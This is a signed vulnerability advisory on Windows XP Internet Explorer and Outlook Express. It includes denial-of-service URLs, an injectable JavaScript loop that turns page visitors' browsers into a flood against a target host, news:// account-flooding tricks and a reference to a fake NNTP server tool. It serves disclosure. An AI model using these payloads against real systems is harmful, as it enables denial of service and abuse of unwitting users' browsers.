-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multiple issues with windows XP. By John C. Hennessy <johnh@dawg.net>
Microsoft was notified 30 days ago as to these problems. Their response 
was that these were not security issues. 

 (-Issue #1-)

 In internet explorer it is possible to use malicious html to cause denial 
 of service.

 Example1 for Windows XP:

 view-source:file://c|/pagefile.sys

 This will cause notepad to open to pagefile.sys if it exists.

 Example2 for Windows XP:

 view-source:http://someip:chargen

 This will cause IE to continuously take up more and more memory as the
 server specified  transmit  a constant stream.

 (-Issue #2-)

 Using malicious html and scripting it is possible to DDoS a target.

 Example1 for Windows XP:

 By injecting the following into a webpage it you can generate a large
 ammount of data to a  target host from visitors internet explorer
 sessions. 

 [IMG src="javascript"for (i = 1; i <= 5000; i++) {
 window.location.replace  ('file:////targetip/')};')"]

 The target will receive a large number connection attempts on port 80. If
 port 80 is open on  the target IE will also attempt to initiate a WebDAV
 session for each request. Resulting in  more traffic to the target.
 
 Another way to accomplish this is to use the same peice of javascript but 
 use http://targetip: and increment port numbers with the loop.

 (-Issue #4-)
 
 It is possible to fill someone's outlook express client with "bogus"
 news server accounts
 
 Example1 for Windows XP:
 
 news://randomtext
 
 This will create a news account for "randomtext". This can be looped in
 java script and hiden  in HTML tags. Modification to the javascript above
 can easily accomplish this.
 
 (-Issue #4-)
 
 It is possible to create malicious e-mail and force outlook express to
 open it. 
 You'll need the following code to reproduce this
 (http://polaris.dawg.net/~johnh/microsoft/evilnews.c)
 
 Example1 for Windows XP:
 
 This basicly pretents to be an NNTP server and feeds an article to
 outlook when requested.
 Enter the following url into internet explorer.

 news://ipofthecode/evilness@thenewsstand

 This will spawn a received email window on the machine. 


- ------------------------------------------------------------------------------------------------
#&DocRev;3#



-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBPbdpCQlqzZaeb3NpEQLPMACgnmVtRqv4YdJMBnvH77Tyvnked0cAoNxD
SWa3AdB/RwOWot6bJnQWlga0
=elfD
-----END PGP SIGNATURE-----